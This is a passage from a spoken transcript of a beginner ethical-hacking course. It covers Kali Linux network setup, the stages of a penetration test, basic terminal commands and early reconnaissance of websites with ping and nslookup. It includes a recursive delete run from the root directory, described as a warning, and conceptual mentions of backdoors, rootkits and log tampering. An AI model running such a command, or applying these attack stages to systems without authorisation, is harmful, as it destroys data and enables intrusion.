replaced until the system is restarted. What this simply means is that this installation will not have any effect until we reboot or restart our machine. So there are two ways that we can do that. You can either go in right corner right here, click on this and click on restart. or you can do it in the cool way using terminal. So if I cancel here and go back to my terminal and type the command reboot, it will say command not found. And if you get this message as well, what we want to do, we want to type sudo and then once again reboot, press enter, and this will restart our machine for us with just one command that we ran in terminal. Now we're ready to perform the second check. And the second check would be internet connection. So we want to see whether we can access the internet. And to check that, we're going to use our terminal once again. And we will try to ping Google. So let us open up our terminal. We already know how to do that. Right click and then open terminal here. And if we receive responses back from Google, that means we can access the internet. So let's check it out. Type ping google.com. And here it is. We're getting responses back. Great, we can access the internet. To stop this, we must press Ctrl+C. As we can see right here, 21 packets transmitted, 21 received, and 0% packet loss. But even though we can access the internet, I want to point one thing out. If we go to settings of our virtual machine, and we select the virtual machine, navigate to settings, and from the settings navigate to network settings, we will notice that we're attached to NAT. And what NAT is a network address translation. This means that the IP address that our Kali Linux machine has will be given to us by a VirtualBox. So if I go to my Kali Linux and in the terminal type sudo ifconfig, press enter, enter my password, here we will see that we got the IP address of 10.0.2.15. And this is the IP address given to us by VirtualBox. Since this can present us a problem later on, we want our IP address to be received from our DHCP or from our router. And before I show you how to do that, I want to point out why this could present us a problem. Well, this IP address right here does not belong to the IP range of my local area network. If I go to my Windows machine and open up command prompt to check out the IP address on my physical machine, I can type right here ipconfig, and I will see right here that the IP address that my physical machine has starts with 192.168.1. And this is not the same IP range. It starts with 10.0.2. So I want to change this to start as my physical machine with 192.168.1. To do that, my Kali Linux must receive the IP address from my router. And for all of you Mac users, you can also type in ifconfig in your terminal on your Mac. Basically, you can check the IP address of your Mac the same way that we did inside of our Kali Linux by typing ifconfig. And all we need to do to change this IP address is go to the network settings and switch from NAT to bridged adapter. This will automatically set my bridged adapter and my adapter to be this one, since this is the only one I have. And since I'm connecting over cable connection, I want to go to the advanced and check right here cable connected. You can select your adapter right here, and once you do, click on OK. Just one more thing before we click on OK. In case your wireless adapter is not working in Kali Linux, since there are some wireless adapters that are not supported by Kali Linux yet, keep in mind that the cable connection will always work. So if your wireless adapter doesn't work, just switch the adapter to cable connection and then press on OK. Now that we changed this, if I go back to my Kali Linux machine and run the same command, which is sudo ifconfig, now it starts with 192.168.1. And keep in mind that for you it might start differently. It doesn't have to start with these three numbers. It might be something like 192.168.0, or it might be something like 10.1.1 or 10.0.1. It depends on your network. So now we can see that both of these IP addresses are starting the same. Okay, great. now that we went through both of the checks for the full screen and network connection, in the next few lectures, we can proceed to get more familiar with the Kali Linux environment and hackers terminology. See you there. Welcome back. In the last lecture, we talked about configuring our Kali Linux network settings to have internet connection inside of our Kali Linux machine. Now let's see whether that is set properly, and in case it isn't, let's see what we can do to get network connectivity within our Kali Linux machine. So, a quick reminder, last lecture we selected our Kali Linux machine, we went on settings, we went on network settings, and we chose bridged adapter for our Kali Linux machine. Now, to check whether that works, we can type once again ifconfig inside of our terminal that we can open by clicking on this icon right here, which is the terminal icon. And under the ETH0 interface, we should get our IPv4 address that should belong to our network's IP range. If you do get it, that's good. If you don't get it, or if you don't get any IP address at all right here, then we must change something. But before we do that, we want to also check whether we can ping, let's say, Google, or any IP address or any website whatsoever. As you can see, I'm receiving responses right here from Google, so that is good. I'm also getting an IPv4 address that belongs to my network range, so both of these things are good, and I can proceed to the next lecture with bridged adapter. If both of these also work for you, feel free to continue and you can skip the rest of this lecture and just move on to the next one. If your bridged adapter, however, is causing some issues, whether that being your IP not being present here, or you not getting any packets back from Google or any other website or IP address, then we have to change our network settings. So go back to VirtualBox window, select your virtual machine or your Kali Linux machine, go to settings, and another option that we can go besides bridged adapter, in case bridged adapter doesn't work, so always go first with bridged adapter, but in case it doesn't work, we want to go with NAT network. So don't confuse it with NAT. We are not choosing just NAT, we want to choose NAT network. And here you will notice that we don't have NAT network selected. That is because we haven't created one yet. But before we create it, let's just quickly explain what NAT network is. Essentially, NAT network allows us to have a separate network where our virtual machine will be connected to, and later on, once we create multiple virtual machines, we can put several different virtual machines onto the same NAT network, and they will be able to communicate with one another. If we just leave it on NAT, which is default, then our virtual machine will most likely have internet connection, but it will not be able to communicate with machines inside of our network. Okay, if we select NAT network, let's click on cancel first so we can create it. And to create the NAT network, we want to click on tools, we want to click on preferences, we want to go to network, and here under the NAT networks, we want to click on this plus sign, which will generate the NAT network for us. If I double click it, it will also give us the information about the NAT network, and if you want, you can change certain things right here, such as whether you support IPv6, or you want to change the range of your network. It doesn't matter, the network name, it's all up to you. I will just leave all of this on default and I will click on OK. I will also click on OK here, and all I have to do is go back to settings of my Kali Linux virtual machine, go back to the network settings and switch from bridged adapter to NAT network, and now you will see that under the name we have our NAT network selected. Once I click OK, it will save the settings. I will now reboot my virtual machine. Let's give it a restart. So here it is, our Kali Linux or my Kali Linux has rebooted, and now let's see whether we do get an IP address and whether we can ping websites from our Kali Linux. So first thing we do once again, we open terminal by clicking here. And if I type ifconfig, now we get a different IP address, which is the IP address from the NAT network right here, which is good. And yours might be different, just so you know, it doesn't have to be the same as mine. And the second test that we perform is we ping Google or we ping any other website or IP address, and we are getting response back. So our NAT network works properly. Okay, awesome. That will be all when configuring network settings. Now, two things to take away from this lecture and previous lecture are if your network settings work well with bridged adapter, then proceed with the bridged adapter here and for any future virtual machine that we create throughout the course. If you have problems with bridged adapter, whether that being not having an IP address or not being able to browse Firefox or not being able to ping any website, then proceed by going onto the NAT network, configure the NAT network, which we did from tools and then preferences, and then select the NAT network here, reboot your machine, and it should have the NAT network's IP address, as well as it should be able to ping different websites. The same thing should be applied for any future VM that we create throughout the course. If your Kali Linux is on NAT network, the other virtual machines should also be on NAT network in order for them to communicate. Nonetheless, thank you for watching, and I will see you in the next lecture. It is time we slowly start getting into penetration testing process. For now, we didn't yet perform any hacking, but we are getting there. It is important we get the basics first and that we know why we do everything, and trust me, later in the course we will be doing some serious stuff and everything will make sense because we covered all the basics first and we didn't just jump into something without any preparation. So in this video we will be briefly talking about stages of penetration test. How does it go? In which order do we perform the steps? And which steps are crucial? For now on, we got our virtual lab set up. We installed Kali Linux and all the tools that hackers use are now available for us in our machine. We also performed some configuration to it to get it full screen, as well as performed setup for internet connection. From now, the basic steps that we are going to do is we will use our Kali Linux machine to scan and attack different machines, networks, websites and accounts. But how are we going to do that? Do we just magically attack it? And do we just install virus on their machine somehow? And if so, how do we do that? What about Trojans, password cracking or phishing? Is that what we do? Well, that is just a small portion of a penetration test. First thing and most important thing before we even start a penetration test on a target is to figure out, do we have permission to attack this target? This is very important since you don't want to be attacking machines or target networks that you do not have permission to attack. It could be that client told me to only test one machine on the network and not the entire network. Therefore, I'm only allowed to test that one machine. Or it could be that our client has multiple networks and they only allowed us to test one of them. That means you should not go around and try to hack different machines on a different network. Now, these are only some of the examples, but what's important to get out of this is that always have permission to perform a penetration test. Trying to hack or hacking something that you are not allowed to hack could potentially get you into some serious trouble if you get caught. Now that we got that out of the way, let us finally talk about different stages of penetration testing. We already know that there are 5 of them, and the first one is reconnaissance or information gathering. Now, reconnaissance is the act of gathering information about your target to better plan out your attack. And this step of penetration testing is the only one that you can perform on any website or target that you want, since gathering information about something is not illegal. There are 2 ways that we can go about doing information gathering: actively, by directly interacting with our target, or it can be done passively without interacting with the target. A simple example of this would be, let's say you want to gather information for Facebook, and you would do it actively by visiting Facebook page and getting all the information that you can from the Facebook page itself, while passively it would be if you went to some other website that talks about Facebook and you get information about Facebook from that other website. This would mean you never interacted with Facebook, therefore you performed a passive information gathering. After this step comes scanning. Here is where you can start getting in trouble if you do it without permission. Scanning is a deeper form of information gathering using technical tools to find openings in the target and in the systems that you're attacking. These openings can be gateways, open ports, operating systems that the target runs, and so on and so on. In this step, we also perform vulnerability scanning, which is just searching for vulnerable software in the target system or network that could possibly be exploited. After information gathering and scanning comes third step, which is gaining access, or so-called exploitation. And this is the step where we actually hack the target. We use information that we gathered in phase 1 and phase 2 to take control of any number of target devices. Gaining access of target devices allows us to steal data from their system or to use those devices to attack other devices on the same network. Usually, after this step, you can consider penetration tests to be successful since you managed to gain access to a target system. However, this is not the last step of a penetration test. After exploitation comes maintaining access. This step, with the fifth step, is sometimes optional. You might not need to always perform last two steps since client might only care whether their system is penetrable. Therefore, you prove them it is after the third step. If there was a vulnerability, of course. However, maintaining access is also an important step and it is commonly done by installing backdoors and planting rootkits. What a backdoor and rootkits are simply programs that will allow us to gain access to that target whenever we want, without the need to exploit it again. We just connect to the backdoor that we planted in the target system, and there it is. We are again on their machine. And last step of penetration test is covering tracks. Covering tracks is simply removing all evidence that an attack ever took place. This can involve deleting or hiding files, editing logs, or basically reverting any changes that you did to the system while the attack took place. Okay, so these 5 steps are the entire process of a penetration test, and we're going to cover them in great detail throughout our course. Keep in mind that these steps should be performed in order, and one more important thing is, in case you're a beginner, you might think that third step, which is exploitation or gaining access, is the most important step of the process. Even though it is very important and crucial, the most important steps are actually information gathering and scanning. It is in these 2 steps that we gather information about the target and discover vulnerabilities. So if you're not that good in gathering information, you might miss some things that could be used to gain access to the machine, therefore preventing you to find an actual vulnerability. So just keep that in mind, that information gathering is 70% of work. Okay, good, so we talked a little about these phases, but before we get to perform each one of these steps, we must first get a little familiar with our Kali Linux machine. So in the next few lectures, we're going to get into details about terminal and some of the commands we can run and execute with it. See you there. Welcome back. Here we are in our Kali Linux machine, and it is time we finally learn how to use that mysterious tool that is said to be the most important tool that we must master. Don't worry, terminal is not difficult to use. But before we get to open it and run a bunch of the commands, let us first define what terminal is. So what is it? Terminal is a program that allows us to interact with Linux operating system using different commands. We can create files, delete files, create directories, run programs, set different tasks to execute, and we can do many more things using it. It is important you get used to it, especially if you never used it before, because if you are coming from Windows or Mac OS, you probably are used to opening files or folders by clicking on different icons and navigating like that. For example, on Windows, we usually open files by double-clicking on an icon and it will open that folder. And on Linux, we can actually do the same thing. So if I go right here, and for example, I want to open this home folder, I will double-click on that folder and it will open the folder with all the files inside of it. But we don't want to be doing it like that. Let us see how we can do it using Terminal. So let us close this first, and we already know how to open Terminal. Right-click on Desktop and click Open Terminal here. First thing that we notice is username that we have right here and the host name that we have right here. But we also notice this /desktop. This means that our terminal process has opened inside of the desktop directory. Does it always open there? Nope. It only opened there because we told it to open there. Remember, we right-clicked on desktop and clicked Open Terminal here. If we, for example, went to the home folder and right-clicked here, Open Terminal, it doesn't say /home like it did in desktop. It just gives us this wavy minus sign. Well, that sign in Linux means that you are in your home directory of your user. And our user is called Mr. Hacker, so the directory name should be /home/Mr. Hacker. And to check the directory name, we can type the command pwd. If we press enter, it will give us the current directory in which our terminal process is running. And it is /home/Mr. Hacker. And this pwd simply just stands for print working directory. If we, for example, go to the folder once again, which is /home folder/Mr. Hacker, and we double click on documents, try to open terminal here, so open terminal here. This will open a second terminal and you will see right here that it says /documents. But do we always need to go to that folder and open terminal inside of that folder for it to be inside of this directory? Of course not. We can use a command called cd. And you should be familiar with this command since we already used it before. Let us test it out. Let's go to the documents directory from our home directory. So I will just close this second terminal. And right here we are inside of our home directory, or /home/Mr. Hacker. We know that inside of this directory there is a documents directory, since we managed to open it right here. And to navigate to this directory using terminal, we can use the command cd and then the name of the directory, which is documents. We press enter, and here it is. We are in /documents directory. If we type pwd here, it will tell us the current working directory is /home/Mr. Hacker/documents. And for example, if we wanted to go one step or one directory back, we can type the command cd and then 2 dots. What this command will do is it will go one directory back, and if I type pwd once again, we will now be again in /home/Mr. Hacker directory. So these 2 dots tell the terminal to go one directory back. Okay, great, but how can we know which subdirectories and files are in home directory, for example? We knew there was a documents directory in home folder because we opened it right here. We didn't open it over terminal, we opened it right here from our desktop. Once we open it again, we can see all of the folders and files inside of this /home/Mr. /Mr. Hacker directory. But we didn't see these files inside of our terminal. So how can we list them? How can we see all of these files using terminal? So we know which directories are available inside of this /home/Mr. Hacker directory. To check files and folders in any directory, we can use another familiar command, which is ls. And the ls command stands for list, so let's just test it out. If we type it, press enter, here we are. We can see same folders and same files that we can see inside of this window right here. So what we did for now is we used terminal instead of clicking on bunch of files, bunch of icons. We now are doing all of that with our terminal. Now that we know which folders are in this directory, we can choose which folder we want to go to and use cd command to go there. But let us go one directory back from the /home/Mr. Hacker. To do that, we already know we can type cd and then 2 dots. And by the way, cd simply stands for changing directory. Don't know if I mentioned that, but cd is changing directory. And now we can see once we went one directory back, we are in /home directory. If we type ls here, we can see here is our Mr. Hacker directory that is containing these files right here. Since we went one step back, we can only see Mr. Hacker directory, since this is the only folder inside of the /home directory. Let's go one more step back. If I type cd, 2 dots, once again, now I am in /directory. And it is called /directory because it is only specified as a forward slash. And we can't go more than that. This is the main directory that has all of the other files and directories in the system. If we try to type cd once again, you will see it will still be in the /directory. And remember when I told you during Kali Linux installation that we will shortly see /home, /tmp, /var directories that occurred in one of the installation questions? Well, if I type ls right here, here they are. These are all just standard Linux directories. And here is /home, from which we came from. Here is /var. And here is tmp. And a bunch of other directories, and these are all just standard Linux directories. From here, you will notice that not all of it is same color. This is because not all of the stuff we see here is the same thing. Something is a directory, something is a file, and for example, we cannot use cd command onto a file. We can only use cd to go to another directory. So if I try, for example, cd, and I choose this file, so cd init rd.img, and press enter, this will not work. It will give us an error saying not a directory. But if I type cd and then @c, for example, which is this directory, and press enter, now I will be inside the @c directory. And here I can type ls to list all of the files inside of the @c directory. And you will also notice that here we got a mixture of files and directories as well. Directories are these dark blue names, while files can be other colors depending on file type. Usually they are white. Okay, great. We learned the basics of navigating through Linux system and directories using different commands. Now, before we finish this video, here is a practice test. Try returning to the desktop directory from this @c directory, using only the commands that we learned. I will give you right now a few seconds, and I will show you how to do it. So, try it out. Okay, don't worry if you didn't get it. This will come with practice, so here it is how we can do it. From the @c directory, we know that we must go back to the /directory. And in the /directory, we got our home directory. we can check it out by typing ls. And inside of this home directory, we know that we got the Mr. Hacker directory, and the Mr. Hacker directory has the desktop directory. So to navigate there, we can type cd home, type ls here, then type cd Mr. Hacker, type ls here once again to check out all of the available directories, and cd desktop. And now we are on our desktop directory once again. Great, so practice a little bit with these commands. This is nothing really too hard, just take some practice and you will get used to it pretty soon. And in the next video, we're going to see how we can create files and folders using terminal, as well as we're going to see how we can run programs. See you there. Okay, so we know how to find our way to the desired directory in terminal, but what if we need to create a file or a subfolder in another directory? How can we do that? Well, first, let's open up our terminal. And by the way, another way that you can open terminal instead of right-clicking and going open terminal here is going up here to this icon, which says terminal emulator, and clicking on it. By default, this will be inside of your home directory, which we know to be this sign, and if we type the pwd command, we get /home/Mr. Hacker directory. We know that our desktop directory is also inside of this directory, so let's go there. cd desktop, press enter, and now we are in the desktop directory. Let's get back to the files. To create a simple empty file, we can use a command called touch. If I simply just type touch file, and let's call it file1, press enter, this will create a file named file1, and it will have no contents inside of it. We can also see that file1 has been created, as it is right now on our desktop, since we created it inside of the /desktop directory. And if we also type ls, we can see that the file is in our desktop directory. To make sure this file is indeed empty, we can use the command cat, and this command, once executed on a file, writes out all the contents that are inside of that file. Let's try it out. So we specify cat, and then file1, press enter, and this will give no result since, as we already mentioned, the touch command creates empty files. If we want to, for example, put something inside of that file, we can use a command echo. You simply just type it like this, echo, and to put something, you specify after the echo, let's say today is a really good day. So we specified an entire sentence, and all we need to do to put this sentence inside of this file is to specify this arrow to the right. And after it, specify the name of the file that we want to put this sentence in. So echo, today is a really good day, into the file1. Press enter. And if we cat it once again with the cat command, so cat file1, we will see that now it outputs exactly what we've written to that file using the echo command. Okay, that's all good, but there is an easier way and more practical way to do all of this. We can use a text editor to write things inside of a file. And an easy text editor that we can run from terminal is called Nano. So let's try to do the same thing we just did using Nano. If we type Nano, and after Nano comes the name of the file that you want to edit, and since we want to edit a new file that we haven't created yet, we can simply just type name, let's call it file2, and press enter. This will open this empty window where we can type anything we want. We can type file content here, and it can be anything. We can type, for example, text here, but we could also type code if we wanted to. Let's start with text first. Let's write just hello world as a text. To save this, we press Ctrl O together, then enter to save under this name, and then Ctrl X to exit the Nano editor. If we now type cat and then file2, and by the way, we can notice that file 2 has been created along file 1 on our desktop. But if we cat file 2, we can see the output of hello world. So we managed to do it only using one tool, which is Nano, instead of using two tools, which are Touch and Echo. But I also mentioned we can do the same thing with programs. For example, how can we create a Python program using Nano and Terminal? First we need to open a file. So let's type nano and then file3.py, and in this case we add .py because that is an extension for Python programs. Then inside of it, after pressing enter, we're going to run a simple command, which is print and then hello world between the quotes. And you will see that some stuff changes colors. This is because the Nano editor recognizes this as a Python program. What we did right here, in case you're not familiar with Python, is we just ran a simple function that will print out the string that is in between the quotes. So this will just print out hello world. Let's save it with Ctrl O, then press enter and then Ctrl X to exit. And luckily for us, Python is already installed in Kali Linux. So all we need to do to run this program is to type python 3 and then the name of the file, file3.py. Press enter and the program will execute. Here it printed out hello world. Cool, right? You will also notice that the icon is different than these two icons. This is also, once again, because this is recognized as a Python program. It even has the Python icon. Now that we know how to create files and execute Python programs, the next question would be, how can we create directories? To create a directory, we can use the command mkdir, which stands for make directory. To check it out, let us run mkdir and name a directory folder. So press enter, and if I type ls, we will see that we got our files as well as a directory which is different color, and it is called folder. Remember, we differentiate them by color, and also if we try to change directory to the folder, it will work. It will even give us the path of /desktop/folder. Great! In that folder, you can do pretty much anything you want. You can create subfolders or create files. Whatever you want to do, you can. To move, for example, our Python program from the desktop directory to our folder directory, we can use command mv, which stands for move. We must first navigate back to desktop directory, so let's do it using cd and then two dots to go one directory back. And from it, we run the command mv file3.py into the folder. So we specify move, then the second parameter is what we want to move, which in our case is file3.py, and the last parameter is where we want to move it. We want to move it inside of our folder. So press here enter, and you will notice that the file3.py disappeared from our desktop directory. We can also check that by typing ls and notice that our Python program is no longer here. But if we go to the folder directory and type ls here, we will see it here because we moved it. Here it is, file3.py. Now, this is a handy command and you will use it a lot. Besides moving the file, we also want to see how we can copy a file, and we can do it using the cp command. This does the exact same thing as move command, but it doesn't move it from original directory to desired directory, it just copies it. So let's try to copy file3.py and call it file4.py. If I type cp, which stands for copy, file3.py, and I type file4.py right after it, this will create an exact copy of our file in the same directory. If I press enter and type ls, here it is. We got file3.py and file4.py. If we want to change whether they are exactly the same, we can cat the content of file3.py and cat the content of file4.py. And we can see they're both the same Python programs. And last command that we want to cover regarding files is the command rm. This command deletes files and directories, and let's say we try to delete file4.py, that is our copy of our Python program. We can do it by typing rm and then file4.py. Now, be careful with this command, since once you delete a file, there is no trash bin where you can retrieve it, it is gone. If I type enter and type ls, you will see our file4.py is no longer there. Okay, but how do we delete a directory? Let's first create a directory inside of our folder directory, and to do that, we type mkdir, and let's call it folder2. Folder2 is a subdirectory of our folder. If I type ls, here it is. And let's say we did create this directory by mistake and we want to delete it. Can we use rm folder2? Well, we can try it. Cannot remove folder2, and it will tell us that it is a directory. So how do we delete it? Well, we'll remove it in the same way we remove files, we just add an option at the end of the command. So type rm folder2 and then at the end add space and then -r. Press enter and this will delete our directory. Also, double check what you're deleting with this command, since if you go to our slash directory, which is directory containing all folders and files in system, and if we were to type, for example, in that directory rm, then this star sign and then -r, this command would delete entire Kali Linux machine with all of its files. So always pay attention what exactly are you deleting in Linux and from which directory are you deleting. Since inside of the Linux you will not be stopped in deleting anything you want. You can easily delete a crucial file for the operating system and make your Kali Linux machine unworkable. That is also a reason why we are practicing with virtual machine. So I actually ran this, and you will notice that the results of this command, if I type ls, now our folder is completely empty. So I actually ran this by mistake, and keep in mind, if I actually ran this from the slash directory, which is our root directory, I would delete entire Kali Linux system. For now on, it is good since I only deleted our Python program, so it is not a big deal. Okay, great. We learned a bunch of the commands in this lecture. Now I got a practice test for you that you can try to do for the next lecture. Inside of our folder directory, since I deleted my Python program, I want you to create the file3.py once again. You can type anything you want inside of it. You can use the print hello world statement that we used. And what I want you to do, using the commands you learned in this video, is to copy that file in the desktop directory from our folder directory. So you create it inside of this directory, and I want you to copy it back to the desktop directory. A hint is that it can be a little tricky once you copy file from some directory to directory. Anyways, just try it and we're going to see the solution in the next video. Welcome back. Have you managed to figure out the command from previous video? Don't worry if you haven't, since it was a tricky one. Let us see what the solution is. So if I navigate to my folder, which we created in the previous video, we wanted to copy our file3.py, which is our Python program, from folder directory to the desktop directory. And if you tried to solve it but didn't manage to, you probably went with command cp file3.py desktop. And if I press enter, this command probably surprised you since it created another folder, or pardon me, another file in the folder directory called desktop. This is because it read our command as if we wanted to copy our file into another file in the same directory, and we call that file desktop. And this is just how the command works. In order to successfully copy the file to desktop directory, we must run the command and specify the full path to the desktop as well as the name of the copy that we want. So it would look something like this. First, we're going to delete this desktop file since we don't need it. And then you specify cp file3.py, and we specify the full path to the desktop, which is /home/Mr.Hacker and then /desktop. After it, we also want to specify slash and type here the name that we want our copy to have. So let's just call it our copy.py. We add the .py since it is a Python program. Press enter, and you will see right away on the desktop we got our copy.py. Now that we got that figured out, let us talk about a few network commands that we will use a lot throughout this course. The most important command we already know is ifconfig. We use ifconfig command to get our IP address, and what the output of this command is all the network interfaces as well as IP addresses corresponding to those interfaces. If I run ifconfig, we get command not found, so we must run sudo ifconfig, press enter, then we enter our password, and here I have a few interfaces. So let me enlarge the terminal so we can see entire command. Let's just fully enlarge it and run the command once again. And by the way, you can navigate to the previous commands using upper and lower arrow. So I can navigate between all the commands that I ran previously, and here is sudo ifconfig. And this is the output of my ifconfig command. For you, this will probably be different. Here I have ETH0 interface, which is my cable connection, and it has an IP address of 192.168.1.12. And I can also see the loopback interface, which is this LO, which all of us should have, and it will be an IP address of 127.0.0.1, which is also a localhost IP. For this course, we will usually be interested in this ETH0 IP address. If you have another interface called differently, that is also fine. You could have a different named interface if you, for example, are connecting over Wi-Fi. This IP address that we get right here is called local IP address, which means it only works inside of our network to communicate with other devices that are also inside of our network. There is also something called public IP address, which we're going to talk about later in the course. For now, just remember that ifconfig outputs local IP address as well as our network interfaces. Another thing we can get from ifconfig is our MAC address for a specific interface. So for the ETH0 interface, here is my MAC address. And what MAC address is a unique identifier for every device, unlike local IP addresses that could be the same in different networks. For example, it is a great possibility that you also have the IP address starting with 192.168.1, while the MAC address is unique for every device in the world. And in case you're new to all of this and don't have much previous experience with MAC addresses and IP addresses, you might be asking, why do we need both of them? Well, let me explain like this. MAC addresses are unique and usable in communications with your neighbor machines or simply with machines that are on your network, while IP addresses are used to communicate over internet and they can also change. Remember it like this. MAC address tells you who you are. IP address tells you where you are. So that is the ifconfig command. And now that I think of this ifconfig command, there is one more important command that I didn't show you and that you will use a lot, which is sudo. Remember, we used it with ifconfig. Now, sudo is not a part of the ifconfig command, it is just a command that we use once we want to execute something as a root user. And just to remind you, a root user is something like an administrator. It has highest privileges above all other users. With root user, you can execute any commands that you want. For example, once we ran this ifconfig command, it told us command doesn't exist. If I just type once again ifconfig, it will say command not found. but after using sudo ifconfig, we managed to execute it. That is because ifconfig command must be ran with root privileges in order for it to execute. Throughout this course, we will encounter many programs and many commands that will require sudo in order to run. And sometimes there could be multiple commands at once that we must execute as a root user. There is one cool trick so you don't have to type sudo before every command, is to run at the beginning sudo and then su. Press enter, and if you're running sudo for the first time inside of one terminal session, it will ask you for your password and then it will log in into the root terminal. So everything you run from now on, you will run as a root account. Right now, I no longer need to specify sudo ifconfig, I can just specify ifconfig, and it will not tell me command not found, it will execute it since I am a root user. As it says right here, it is no longer Mr. Hacker, it is now root. If you want to exit out of this root terminal, you simply just type exit and it will go back to your Mr. Hacker terminal. Now, this can also be applied to files. Some files might be created only for root account to edit. For example, if we run the command sudo touch file1, we press enter, and if we, for example, type sudo nano file1, type here hello there, we Ctrl O to save and then Ctrl X to exit, we won't be able to edit this file as a normal user without the sudo command or without the root account. If I lower this terminal, here is our file1, and the reason why we can't edit it is because this actual file right now has been opened and edited with root privileges. And once we saved it as a root. So right now if I try to nano it, it will tell me file is unwritable, which means I cannot write anything. Well, I mean I can, but if I try to save it, it will tell me right here, permission denied. So let's close this and open terminal once again. However, if we go as a root account, sudo nano file1, and we type our password, now we can type anything we want. Just 1 second, it seems that we opened the wrong file. This is the file1 that we created from the previous video that says today is a really good day. And to go to the file1 that root account created, I believe it is one directory back. Or let's just go to the sudo user, type enter, cd Mr. Hacker, cd desktop, cat file1. Never mind, since we can't really find it, let us just create another file. Just make sure you go to the root account of the terminal and then type nano test file. And once you type nano test file, here type hello there. Save this. Exit the root account, and if I lower terminal right now, we will see this test file right here on our desktop, but it also has this lock right here. This means we as a normal user cannot edit this file. We first need to go to desktop directory, so let's go to the Mr. Hacker and then desktop, and we nano test file. It will tell us once again, file is unwritable. Only root account can edit it. And this is something you will encounter a lot, so it is really important next time you see either something like command not found, or write protected file, or this requires root privileges, just know that it needs to be ran with sudo. Alrighty, so with this we finished our small crash course for Linux, and I would advise you to practice a little bit with the commands we learned, and also explore Kali Linux operating system a little bit. Go to different directories, see what it all has, but be careful not to delete some important files. Okay, now we are ready to finally go into the process of penetration testing. Hopefully you are excited since this is where the fun starts. Let us see how to perform the first phase, which is information gathering. See you there. Welcome back. It is time we learn in details what is information gathering and how can we perform it? We already know that information gathering is the first step in penetration testing, and it is an act of gathering data about our target. It can be any type of data that we might find useful for the future attack, and if you remember, there are two types of information gathering. We got active information gathering and passive information gathering. And we talked briefly about them, but now it is time to fully explain what both of them are. So let's start with active information gathering. In active information gathering, we use our Kali Linux machine and we try to get as much data or as much information about our target while interacting with them. It could be a target website that we need to test, so we need to find as many things about it as we can. Or it could also be a network that we're testing, or perhaps an entire company. The main point is that with active information gathering, we directly get that data from the target. This could mean directly exchanging packets with the target by visiting and enumerating their website, or it could also mean talking to an employee that works there. We could maybe call them over mobile phone to try to get them to tell us something important, but this part is also considered social engineering. Nonetheless, any action where you exchange something with the target is active information gathering. This can be legal to an extent. If you start performing some advanced scans or OS fingerprinting on the target, you most likely won't get in trouble, but you should still not do it without permission. And it is important to mention that usually active information gathering will provide us with much more important data than passive information gathering, since we are directly interacting with the target. On the other hand, we got passive information gathering. And it is similar, we got our Kali Linux machine and our target. But we also have an intermediate system, or what I like to call a middle source. And what this middle source is, well, basically it could be anything, from a search engine to a website. It could also be a person, but what matters is that information we get is going through that middle source. For example, if we want to find out something about a certain target and we Google that target to find some pages that contain information about it, this is considered passive information gathering. Okay, good, but what are the goals of this? What exactly are we searching for? Which information could be of value to us? Usually, the first thing we search to identify a target is their IP address, or IP addresses if the target has multiple addresses that belong to them. This could be, for example, a company that has servers and buildings all around the world. And if we were to test this company, we would also be interested in their employees too. For example, we would want to gather their emails, which could be useful for a future attack to gain access to that company, or we could possibly want to gather their phone numbers, which could also be useful. But most importantly, and what we're mainly interested in, are technologies that the target has. If it was a company, we would want to know how many networks they have, what softwares are running on their machines, what operating systems they have. If it was a website, we would also want to know how that website was built, which programming languages it has. Does it have JavaScript or PHP, for example? Just one software on one machine that is outdated or that has a known vulnerability that could be exploited is our way in. So, now that we know what we're looking for during this first step, it is time we see what tools and programs can we use to find out as much information as possible about our target. Let's do it. Welcome back. Since this is our first video in information gathering, we're going to start off with something easy. Let us see how we can identify our target and get its IP address. We're going to check how we can do this both actively and passively. Let's do it with active information gathering first. So this means we're going to interact with our target. So just go on Google and pick a website that you want to use for this. It can be any website that you want, and you can also use the ones that I will show in this video. First, open up your terminal. And what we're going to do, for the first test, I'm going to use this website. This is just some university page that I picked, and what we can do to get its IP address is to ping it. Most of you will already be familiar with Ping tool, since it is installed by default on any operating system. By pinging this website or any other website, we're sending something called ICMP packets to that website, and if we get responses back, that means that website is up and running. But what we also get besides that response is the IP address. So let's try it out. I will leave this link right here, and I will just add at the beginning ping space and then hit enter. And it seems that we're not getting any responses back, but what we did get is an IP address. Here it is. And we're not getting responses back from this site because it is probably blocking ping probes, which some websites often do. Let us try another site to see how it looks once we get responses back. So to stop this, you can simply just press Ctrl+C, and it will tell us 32 packets transmitted and 100% packet loss. Now this doesn't mean that this website is offline, since if we visited this link right here or this IP address, we would open a page to that website. But just in case, let us see how it looks like once we get the response back from the ping command. If I try to ping a big website, for example like Facebook, so let's type ping facebook.com. Here we get an IP address of Facebook, and we can Ctrl+C since we can notice that we are getting packets back, which means Facebook is up and running and also responding to our ICMP packets. Just to note, this IP address right here is just one of the IP addresses that Facebook uses. So for you, once you ping it, you will probably get a different result. Okay, what we saw right here is an example of active information gathering to get the IP address, since we directly send packets to these websites. Another tool you can use to get IP from a website is called NSLookup. So if I go down here and type NSLookup and then the name of the website, which in our case, let's try with the first one, which is this one. And once again, you can test any website you want with this. It doesn't matter. If I press enter, it will give me this response, which says server and address right here. But this is not the IP address of this website. This is just my router, and where the result or where the IP address of this website is down here. Here it is. If we compare this one and we go back to the ping command, you will notice the IP address is the same. So we got the same result, which is good. Let's try the same with Facebook, so just type right here NSLookup facebook.com. And we also get the IP address of Facebook. Now, if you wanted to do this passively, you would search for this information, such as IP address, over some other website. Let us see how we can do that. First of all, we want to open our Firefox, and to do that, just click on this Kali Linux icon in the top left corner and type Firefox. You should see Firefox ECR. Click on it. And what we're going to look for is a website that provides us with IP address of a different website. And since I don't know any website that does that, I will simply just go right here in the search bar and type what is an IP address of this website. If I press enter, it should probably give me a few results of different websites that will do exactly what we want, which is get the IP address of another website. And let's go with this one, IP checker, which is ipinfo.info. If I click on it, and down here we see something that says IP domain checker. we need to specify the IP address, the domain, or URL. And if we type the domain name of that first website, so if I type the same domain name and click right here on check. Okay, so some security check, select all traffic lights. Let's select all traffic lights that we see. And here is the result. And you will notice that right here we get even more information than we asked for. For example, here is the IP address of this website. We also get from which country it is, as it says right here in the brackets. And we also get its geolocation, which says even the city. We can also check it out on Google Maps if we wanted to. Down here we get even more information such as reverse DNS. Here we get information about registration date, modification date, expiration date. Down here we get some of the DNS servers, and here we get its physical address. So this is the exact location to where this server is located. Now this is just the same result, I believe. Down here we also get some email addresses, as we can notice right here. All of this could be useful for us depending on which type of attack we would plan. Now of course we're not going to be attacking this website since we do not have permission, but we're simply just gathering information to see what can we retrieve from the internet about this website. And from now on we're getting a bunch of information about it. Now, similar response that we got 